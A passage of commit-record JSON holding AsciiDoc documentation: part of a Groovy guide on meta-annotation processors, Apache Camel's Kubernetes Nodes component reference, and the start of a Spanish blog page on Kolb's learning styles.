case, totally up to you. To do this, you must:\n\n* create a meta-annotation processor, extending gapi:org.codehaus.groovy.transform.AnnotationCollectorTransform[AnnotationCollectorTransform]\n* declare the processor to be used in the meta-annotation declaration\n\nTo illustrate this, we are going to explore how the meta-annotation `@CompileDynamic` is implemented.\n\n`@CompileDynamic` is a meta-annotation that expands itself\nto\u00a0`@CompileStatic(TypeCheckingMode.SKIP)`. The problem is that the\ndefault meta annotation processor doesn\u2019t support enums and the\nannotation value `TypeCheckingMode.SKIP` is one.\n\nThe naive implementation here would not work:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_naive,indent=0]\n----\n\nInstead, we will define it like this:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_def_fixed,indent=0]\n----\n\nThe first thing you may notice is that our interface is no longer\nannotated with\u00a0`@CompileStatic`. The reason for this is that we rely on\nthe `processor` parameter instead, that references a class which\nwill\u00a0*generate* the annotation.\n\nHere is how the custom processor is implemented:\n\n[source,groovy]\n.CompileDynamicProcessor.groovy\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_processor,indent=0]\n----\n<1> our custom processor is written in Groovy, and for better compilation performance, we use static compilation\n<2> the custom processor has to extend gapi:org.codehaus.groovy.transform.AnnotationCollectorTransform[AnnotationCollectorTransform]\n<3> create a class node representing the `@CompileStatic` annotation type\n<4> create a class node representing the `TypeCheckingMode` enum type\n<5> `collector` is the `@AnnotationCollector` node found in the meta-annotation. Usually unused.\n<6> `aliasAnnotationUsage` is the meta-annotation being expanded, here it is `@CompileDynamic`\n<7> `aliasAnnotated` is the node being annotated with the meta-annotation\n<8> `sourceUnit` is the `SourceUnit` being compiled\n<9> we create a new annotation node for `@CompileStatic`\n<10> we create an expression equivalent to `TypeCheckingMode.SKIP`\n<11> we add that expression to the annotation node, which is now `@CompileStatic(TypeCheckingMode.SKIP)`\n<12> return the generated annotation\n\nIn the example, the `visit` method is the only method which has to be overridden. It is meant to return a list of\nannotation nodes that will be added to the node annotated with the meta-annotation. In this example, we return a\nsingle one corresponding to `@CompileStatic(TypeCheckingMode.SKIP)`.\n\n=== Inheritance\n\n(TBD)\n\n\n[[generics]]\n=== Generics\n\n(TBD)\n\n\ninclude::{projectdir}\/src\/spec\/doc\/core-traits.adoc[leveloffset=+1]\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac3bedb486840a1e421b6c8392f4c5be26c6a69b","subject":"Camel-Kubernetes-nodes: Better description","message":"Camel-Kubernetes-nodes: Better description\n","repos":"pmoerenhout\/camel,nikhilvibhav\/camel,tadayosi\/camel,pmoerenhout\/camel,adessaigne\/camel,pmoerenhout\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,tdiesler\/camel,pmoerenhout\/camel,tadayosi\/camel,alvinkwekel\/camel,mcollovati\/camel,nikhilvibhav\/camel,apache\/camel,nicolaferraro\/camel,christophd\/camel,tadayosi\/camel,gnodet\/camel,tadayosi\/camel,pax95\/camel,apache\/camel,nikhilvibhav\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,pmoerenhout\/camel,gnodet\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,nicolaferraro\/camel,tdiesler\/camel,gnodet\/camel,cunningt\/camel,tdiesler\/camel,tdiesler\/camel,alvinkwekel\/camel,gnodet\/camel,nikhilvibhav\/camel,mcollovati\/camel,pax95\/camel,christophd\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,mcollovati\/camel,alvinkwekel\/camel,pax95\/camel,christophd\/camel,apache\/camel,christophd\/camel,cunningt\/camel,pax95\/camel,adessaigne\/camel,mcollovati\/camel,cunningt\/camel,nicolaferraro\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,apache\/camel,pmoerenhout\/camel,apache\/camel,gnodet\/camel,adessaigne\/camel,nicolaferraro\/camel,alvinkwekel\/camel","old_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-nodes-component.adoc","new_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-nodes-component.adoc","new_contents":"[[kubernetes-nodes-component]]\n= Kubernetes Nodes Component\n:docTitle: Kubernetes Nodes\n:artifactId: camel-kubernetes\n:description: Perform operations on Kubernetes Nodes and get notified on Node changes.\n:since: 2.17\n:supportLevel: Stable\n:component-header: Both producer and consumer are supported\n\/\/Manually maintained attributes\n:group: Kubernetes\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe Kubernetes Nodes component is one of xref:kubernetes-summary.adoc[Kubernetes Components] which\nprovides a producer to execute Kubernetes Node operations and a consumer to consume events related to Node objects.\n \n\n\n== Component Options\n\n\/\/ component options: START\nThe Kubernetes Nodes component supports 3 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Kubernetes Nodes endpoint is configured using URI syntax:\n\n----\nkubernetes-nodes:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (30 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (common) | The Kubernetes API Version to use | | String\n| *dnsDomain* (common) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (common) | Default KubernetesClient to use if provided | | KubernetesClient\n| *portName* (common) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (common) | The port protocol, used for ServiceCall EIP | tcp | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *labelKey* (consumer) | The Consumer Label key when watching at some resources | | String\n| *labelValue* (consumer) | The Consumer Label value when watching at some resources | | String\n| *namespace* (consumer) | The namespace | | String\n| *poolSize* (consumer) | The Consumer pool size | 1 | int\n| *resourceName* (consumer) | The Consumer Resource Name we would like to watch | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. The value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. | | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\n== Supported producer operation\n\n- listNodes\n- listNodesByLabels\n- getNode\n- createNode\n- deleteNode\n\n\n== Kubernetes Nodes Producer Examples\n\n- listNodes: this operation list the nodes on a kubernetes cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:list\").\n toF(\"kubernetes-nodes:\/\/\/?kubernetesClient=#kubernetesClient&operation=listNodes\").\n to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation return a List of Nodes from your cluster\n\n- listNodesByLabels: this operation list the nodes by labels on a kubernetes cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listByLabels\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n Map<String, String> labels = new HashMap<>();\n labels.put(\"key1\", \"value1\");\n labels.put(\"key2\", \"value2\");\n exchange.getIn().setHeader(KubernetesConstants.KUBERNETES_NODES_LABELS, labels);\n }\n });\n toF(\"kubernetes-deployments:\/\/\/?kubernetesClient=#kubernetesClient&operation=listNodesByLabels\").\n to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation return a List of Nodes from your cluster, using a label selector (with key1 and key2, with value value1 and value2)\n\n== Kubernetes Nodes Consumer Example\n\n[source,java]\n--------------------------------------------------------------------------------\nfromF(\"kubernetes-nodes:\/\/%s?oauthToken=%s&resourceName=test\", host, authToken).process(new KubernertesProcessor()).to(\"mock:result\");\n\n public class KubernertesProcessor implements Processor {\n @Override\n public void process(Exchange exchange) throws Exception {\n Message in = exchange.getIn();\n Node node = exchange.getIn().getBody(Node.class);\n log.info(\"Got event with configmap name: \" + node.getMetadata().getName() + \" and action \" + in.getHeader(KubernetesConstants.KUBERNETES_EVENT_ACTION));\n }\n }\n--------------------------------------------------------------------------------\n\nThis consumer will return a list of events for the node test.\n\n\ninclude::camel-spring-boot::page$kubernetes-starter.adoc[]\n","old_contents":"[[kubernetes-nodes-component]]\n= Kubernetes Nodes Component\n:docTitle: Kubernetes Nodes\n:artifactId: camel-kubernetes\n:description: Perform operations on Kubernetes Nodes and get notified on Node changes.\n:since: 2.17\n:supportLevel: Stable\n:component-header: Both producer and consumer are supported\n\/\/Manually maintained attributes\n:group: Kubernetes\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe Kubernetes Nodes component is one of xref:kubernetes-summary.adoc[Kubernetes Components] which\nprovides a producer to execute kubernetes node operations and a consumer to consume kubernetes\nnode events.\n \n\n\n== Component Options\n\n\/\/ component options: START\nThe Kubernetes Nodes component supports 3 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Kubernetes Nodes endpoint is configured using URI syntax:\n\n----\nkubernetes-nodes:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (30 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (common) | The Kubernetes API Version to use | | String\n| *dnsDomain* (common) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (common) | Default KubernetesClient to use if provided | | KubernetesClient\n| *portName* (common) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (common) | The port protocol, used for ServiceCall EIP | tcp | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *labelKey* (consumer) | The Consumer Label key when watching at some resources | | String\n| *labelValue* (consumer) | The Consumer Label value when watching at some resources | | String\n| *namespace* (consumer) | The namespace | | String\n| *poolSize* (consumer) | The Consumer pool size | 1 | int\n| *resourceName* (consumer) | The Consumer Resource Name we would like to watch | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. The value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. | | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\n== Supported producer operation\n\n- listNodes\n- listNodesByLabels\n- getNode\n- createNode\n- deleteNode\n\n\n== Kubernetes Nodes Producer Examples\n\n- listNodes: this operation list the nodes on a kubernetes cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:list\").\n toF(\"kubernetes-nodes:\/\/\/?kubernetesClient=#kubernetesClient&operation=listNodes\").\n to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation return a List of Nodes from your cluster\n\n- listNodesByLabels: this operation list the nodes by labels on a kubernetes cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listByLabels\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n Map<String, String> labels = new HashMap<>();\n labels.put(\"key1\", \"value1\");\n labels.put(\"key2\", \"value2\");\n exchange.getIn().setHeader(KubernetesConstants.KUBERNETES_NODES_LABELS, labels);\n }\n });\n toF(\"kubernetes-deployments:\/\/\/?kubernetesClient=#kubernetesClient&operation=listNodesByLabels\").\n to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation return a List of Nodes from your cluster, using a label selector (with key1 and key2, with value value1 and value2)\n\n== Kubernetes Nodes Consumer Example\n\n[source,java]\n--------------------------------------------------------------------------------\nfromF(\"kubernetes-nodes:\/\/%s?oauthToken=%s&resourceName=test\", host, authToken).process(new KubernertesProcessor()).to(\"mock:result\");\n\n public class KubernertesProcessor implements Processor {\n @Override\n public void process(Exchange exchange) throws Exception {\n Message in = exchange.getIn();\n Node node = exchange.getIn().getBody(Node.class);\n log.info(\"Got event with configmap name: \" + node.getMetadata().getName() + \" and action \" + in.getHeader(KubernetesConstants.KUBERNETES_EVENT_ACTION));\n }\n }\n--------------------------------------------------------------------------------\n\nThis consumer will return a list of events for the node test.\n\n\ninclude::camel-spring-boot::page$kubernetes-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eee097eec30a25ccb9fd68108e6a1cc0e23eb5b3","subject":"Publish 17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","message":"Publish 17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_file":"17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_contents":"<!DOCTYPE html>\n<html>\n<head>\n <meta charset=\"utf-8\" \/>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" \/>\n\n <title>Los estilos de aprendizaje de Kolb - Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/title>\n\n <meta name=\"HandheldFriendly\" content=\"True\">\n <meta name=\"MobileOptimized\" content=\"320\">\n <meta name=\"apple-mobile-web-app-capable\" content=\"yes\">\n <meta name=\"apple-mobile-web-app-status-bar-style\" content=\"black-translucent\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\">\n\n <meta name=\"description\" content=\"\">\n\n <meta name=\"twitter:card\" content=\"summary\">\n <meta name=\"twitter:title\" content=\"Los estilos de aprendizaje de Kolb\">\n <meta name=\"twitter:description\" content=\"\">\n\n <meta property=\"og:type\" content=\"article\">\n <meta property=\"og:title\" content=\"Los estilos de aprendizaje de Kolb\">\n <meta property=\"og:description\" content=\"\">\n\n <link href=\"\/favicon.ico\" rel=\"shortcut icon\" type=\"image\/x-icon\">\n <link href=\"\/apple-touch-icon-precomposed.png\" rel=\"apple-touch-icon\">\n\n <link rel=\"stylesheet\" type=\"text\/css\" href=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/css\/uno.css?v=1.0.0\" \/>\n\n <link rel=\"canonical\" href=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n \n <meta property=\"og:site_name\" content=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" \/>\n <meta property=\"og:type\" content=\"article\" \/>\n <meta property=\"og:title\" content=\"Los estilos de aprendizaje de Kolb\" \/>\n <meta property=\"og:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\" \/>\n <meta property=\"og:url\" content=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n <meta property=\"article:published_time\" content=\"Invalid date\" \/>\n <meta property=\"article:modified_time\" content=\"2016-07-30T18:15:38.993Z\" \/>\n <meta property=\"article:tag\" content=\"e-learning\" \/>\n <meta property=\"article:tag\" content=\"innovaci\u00f3n\" \/>\n <meta property=\"article:tag\" content=\"estilos de aprendizaje\" \/>\n <meta property=\"article:tag\" content=\"TIC\" \/>\n <meta property=\"article:tag\" content=\"educaci\u00f3n\" \/>\n \n <meta name=\"twitter:card\" content=\"summary\" \/>\n <meta name=\"twitter:title\" content=\"Los estilos de aprendizaje de Kolb\" \/>\n <meta name=\"twitter:description\" content=\"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\" \/>\n <meta name=\"twitter:url\" content=\"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\" \/>\n \n <script type=\"application\/ld+json\">\n{\n \"@context\": \"http:\/\/schema.org\",\n \"@type\": \"Article\",\n \"publisher\": \"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\",\n \"author\": {\n \"@type\": \"Person\",\n \"name\": \"Marcelo Sotaminga\",\n \"image\": \"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\",\n \"url\": \"undefined\/author\/undefined\",\n \"sameAs\": null\n },\n \"headline\": \"Los estilos de aprendizaje de Kolb\",\n \"url\": \"https:\/\/marchelo2212.github.io17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc\",\n \"datePublished\": \"Invalid date\",\n \"dateModified\": \"2016-07-30T18:15:38.993Z\",\n \"keywords\": \"e-learning, innovaci\u00f3n, estilos de aprendizaje, TIC, educaci\u00f3n\",\n \"description\": \"Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno...\"\n}\n <\/script>\n\n <meta name=\"generator\" content=\"Ghost ?\" \/>\n <link rel=\"alternate\" type=\"application\/rss+xml\" title=\"Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\" href=\"https:\/\/marchelo2212.github.io\/rss\" \/>\n <link rel=\"stylesheet\" href=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/styles\/default.min.css\">\n\n<\/head>\n<body class=\"post-template tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion no-js\">\n\n <span class=\"mobile btn-mobile-menu\">\n <i class=\"icon icon-list btn-mobile-menu__icon\"><\/i>\n <i class=\"icon icon-x-circle btn-mobile-close__icon hidden\"><\/i>\n <\/span>\n\n <header class=\"panel-cover panel-cover--collapsed \" >\n <div class=\"panel-main\">\n \n <div class=\"panel-main__inner panel-inverted\">\n <div class=\"panel-main__content\">\n \n <h1 class=\"panel-cover__title panel-title\"><a href=\"https:\/\/marchelo2212.github.io\" title=\"link to homepage for Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..\">Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s..<\/a><\/h1>\n <hr class=\"panel-cover__divider\" \/>\n <p class=\"panel-cover__description\">Sitio dedicado a recopilar las cosas que he realizado en algunos lados, para poder tenerlas todas un poco ordenadas, aqu\u00ed encontrar\u00e1s cosas referente a:\n Software Libre - GNU \/ Linux\n Innovaci\u00f3n Educativa\n Ciencia y Tecnolog\u00eda\n Entre otras....\n <\/p>\n <hr class=\"panel-cover__divider panel-cover__divider--secondary\" \/>\n \n <div class=\"navigation-wrapper\">\n \n <nav class=\"cover-navigation cover-navigation--primary\">\n <ul class=\"navigation\">\n <li class=\"navigation__item\"><a href=\"https:\/\/marchelo2212.github.io\/#blog\" title=\"link to Tecnolog\u00eda, Innovaci\u00f3n y m\u00e1s.. blog\" class=\"blog-button\">Blog<\/a><\/li>\n <\/ul>\n <\/nav>\n \n \n \n <nav class=\"cover-navigation navigation--social\">\n <ul class=\"navigation\">\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/www.facebook.com\/marchelo2212\" title=\"Facebook account\">\n <i class='icon icon-social-facebook'><\/i>\n <span class=\"label\">Facebook<\/span>\n <\/a>\n <\/li>\n \n <!-- Twitter -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/twitter.com\/Marchelo2212\" title=\"Twitter account\">\n <i class='icon icon-social-twitter'><\/i>\n <span class=\"label\">Twitter<\/span>\n <\/a>\n <\/li>\n \n <!-- Google Plus -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/plus.google.com\/u\/0\/+MarceloSotaminga\" title=\"Google+ account\">\n <i class='icon icon-social-google-plus'><\/i>\n <span class=\"label\">Google-plus<\/span>\n <\/a>\n <\/li>\n \n \n \n \n \n <!-- LinkedIn -->\n <li class=\"navigation__item\">\n <a href=\"https:\/\/ec.linkedin.com\/in\/marcelo-sotaminga-9ab64562\" title=\"LinkedIn account\">\n <i class='icon icon-social-linkedin'><\/i>\n <span class=\"label\">LinkedIn<\/span>\n <\/a>\n <\/li>\n \n <!-- Email -->\n <li class=\"navigation__item\">\n <a href=\"mailto:marcelo@openmailbox.org\" title=\"Email marcelo@openmailbox.org\">\n <i class='icon icon-mail'><\/i>\n <span class=\"label\">Email<\/span>\n <\/a>\n <\/li>\n \n <\/ul>\n <\/nav>\n \n \n <\/div>\n \n <\/div>\n \n <\/div>\n \n <div class=\"panel-cover--overlay\"><\/div>\n <\/div>\n <\/header>\n\n <div class=\"content-wrapper\">\n <div class=\"content-wrapper__inner\">\n \n\n <article class=\"post-container post-container--single\">\n\n <header class=\"post-header\">\n <div class=\"post-meta\">\n <time datetime=\"Invalid date\" class=\"post-meta__date date\">Invalid date<\/time> • <span class=\"post-meta__tags tags\">on <a href=\"https:\/\/marchelo2212.github.io\/tag\/e-learning\">e-learning<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/innovacion\"> innovaci\u00f3n<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/estilos-de-aprendizaje\"> estilos de aprendizaje<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/TIC\">TIC<\/a>, <a href=\"https:\/\/marchelo2212.github.io\/tag\/educacion\"> educaci\u00f3n<\/a><\/span>\n <span class=\"post-meta__author author\"><img src=\"https:\/\/avatars.githubusercontent.com\/u\/9286299?v=3\" alt=\"profile image for Marcelo Sotaminga\" class=\"avatar post-meta__avatar\" \/> by Marcelo Sotaminga<\/span>\n <\/div>\n <h1 class=\"post-title\">Los estilos de aprendizaje de Kolb<\/h1>\n <\/header>\n\n <section class=\"post tag-e-learning tag-innovacion tag-estilos-de-aprendizaje tag-TIC tag-educacion\">\n <div id=\"preamble\">\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>Dentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno de ellos y responder a la diversidad de caracter\u00edsiticas de los mismo.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"sect1\">\n<h2 id=\"_estilos_de_aprendizaje\">Estilos de aprendizaje<\/h2>\n<div class=\"sectionbody\">\n<div class=\"paragraph\">\n<p>El emplear metodolog\u00edas que apunten a mantener como eje central al estudiante deber\u00e1n tomar en cuenta la heterogeneidad del grupo y trabajar (planificando y aplicado) diversas estrategias did\u00e1ctiva que permitan justamente que todo el grupo genere un aprendizaje significativo. Para esto imprescindible el proponer actividades direccionadas a sus estilos de aprendizaje, por ello, se revisar\u00e1 algunas de ellas con sus caracter\u00edsticas.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"https:\/\/s20.postimg.org\/bt67sp50t\/estilos4.png\" alt=\"Estilos de aprendizaje\"><\/span><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Refiri\u00e9ndose al tema Laura Frade, articula ocho capacidades que deben tener los docentes, estas capacidades interact\u00faan entre s\u00ed para dar como resultado la \u00f3ptima formaci\u00f3n de los estudiantes:<\/p>\n<\/div>\n<div class=\"olist arabic\">\n<ol class=\"arabic\">\n<li>\n<p>Capacidad diagn\u00f3stica: capacidad de detectar las necesidades de aprendizaje del estudiante, alienearla a un estilo de aprendizaje y vincularla con una estrategia de aprendizaje.<\/p>\n<\/li>\n<li>\n<p>Capacidad cognitiva: capacidad que guarda relaci\u00f3n con la adquisici\u00f3n del conocimiento necesario para impartir los contenidos tem\u00e1ticos.<\/p>\n<\/li>\n<li>\n<p>Capacidad \u00e9tica: capacidad que incide en la toma de decisiones del docente sobre su compromiso ante la sociedad, la responsabilidad de trabajo, los valores que promover\u00e1, los juicios de valor que emitir\u00e1, la priorizaci\u00f3n del desarrollo de los estudiantes, la preocupaci\u00f3n sobre su futuro laboral.<\/p>\n<\/li>\n<li>\n<p>Capacidad l\u00f3gica: capacidad para organizar el contenido tem\u00e1ticos de forma l\u00f3gica-secuencial. Se demuestra por su, orden, graduaci\u00f3n y dosificaci\u00f3n.<\/p>\n<\/li>\n<li>\n<p>Capacidad emp\u00e1tica: capacidad que permite entender a los estudiantes en tres diferentes planos: afectivo, cognitivo y 